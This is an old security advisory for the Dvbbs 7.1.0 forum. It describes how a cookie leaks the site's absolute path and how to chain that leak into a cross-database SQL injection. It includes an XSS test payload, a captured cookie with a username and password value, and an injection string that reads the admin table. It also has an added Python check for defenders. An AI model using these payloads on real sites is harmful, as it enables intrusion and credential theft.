Author: LiNZI [B.C.T] @ www.cnbct.org
Information Source: evil baboons Information Security Team
Vendor name: yunnet pioneer Discussion
Vendor address: http://www.dvbbs.net/
Vulnerable program: Dvbbs 7.1.0
Vulnerability description:
The cookie set by Dvbbs 7.1.0 discloses the absolute path of the site. Attackers can combine this with other techniques to perform cross-database SQL queries.
Vulnerability exploitation example:
1. Absolute path disclosure test:
Official test site: bbs.dvbbs.net
Upload an image file with the following content:
GIF89a
<script>alert(document.cookie)</script>
The cookie obtained by packet capture is as follows:
Cookie: ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB; dwebdvbbs7%2E1%2E0=UserID=617054&usercookies=1&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzibct&password=t8ob621664s5v6HL&userhidden=2&StatUserID=2189992004; dvbbs=
Analyze the cookie to obtain the absolute path of the site as follows:
D:\web\dvbbs7 is the absolute path of the forum.
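A defender-side check for this leak, added here as an example and not taken from the advisory or from Dvbbs: given a web root you already know, it flags cookie names that repeat it. The rule that the cookie name is the path with the drive colon and backslashes removed is an assumption inferred from the sample cookie above; `flatten_path`, `cookie_names`, `leaked_path_cookies` and `MIN_FLAT_LEN` are hypothetical names.

```python
import re
from urllib.parse import unquote

# Abridged from the cookie captured in this advisory (most fields dropped).
SAMPLE_HEADER = ("Cookie: ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB; "
                 "dwebdvbbs7%2E1%2E0=UserID=617054&usercookies=1; dvbbs=")

MIN_FLAT_LEN = 6  # hypothetical guard: very short roots match too many names


def flatten_path(path):
    """Drop the drive colon and path separators, lower-case the rest."""
    return re.sub(r"[:\\/]", "", path).lower()


def cookie_names(header):
    """Return URL-decoded cookie names from a Cookie header line."""
    if header.lower().startswith("cookie:"):
        header = header.split(":", 1)[1]
    names = []
    for part in header.split(";"):
        name = part.strip().partition("=")[0].strip()
        if name:
            names.append(unquote(name))  # %2E -> "." and so on
    return names


def leaked_path_cookies(header, web_root):
    """List cookie names that begin with the flattened web root (assumed rule)."""
    flat = flatten_path(web_root)
    if len(flat) < MIN_FLAT_LEN:
        raise ValueError("web root too short to match reliably")
    return [n for n in cookie_names(header) if n.lower().startswith(flat)]


if __name__ == "__main__":
    for name in leaked_path_cookies(SAMPLE_HEADER, r"D:\web\dvbbs7"):
        print("cookie name mirrors install path:", name)
```

Run it against headers captured from your own deployment, passing the real web root; a non-empty result means the cookie name should be changed to a value that is not derived from the filesystem path.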
2. Attack extension:
www.host.com
The main program has a SQL injection vulnerability, but the table and field names cannot be found.
Assumed injection point:
www.host.com\linzi.asp?Fuck=you
The forum is Dvbbs 7.1.0, the database is data\dvbbs.asp, and anti-download processing is implemented.
Use the Dvbbs path disclosure described above: capture packets and get the absolute path d:\www\dvbbs\data\dvbbs.asp
The cross-database query is implemented as follows:
www.host.com\linzi.asp?Fuck=you and (select count(*) from dv_admin in "d:\www\dvbbs\data\dvbbs.asp")
Official patch:
None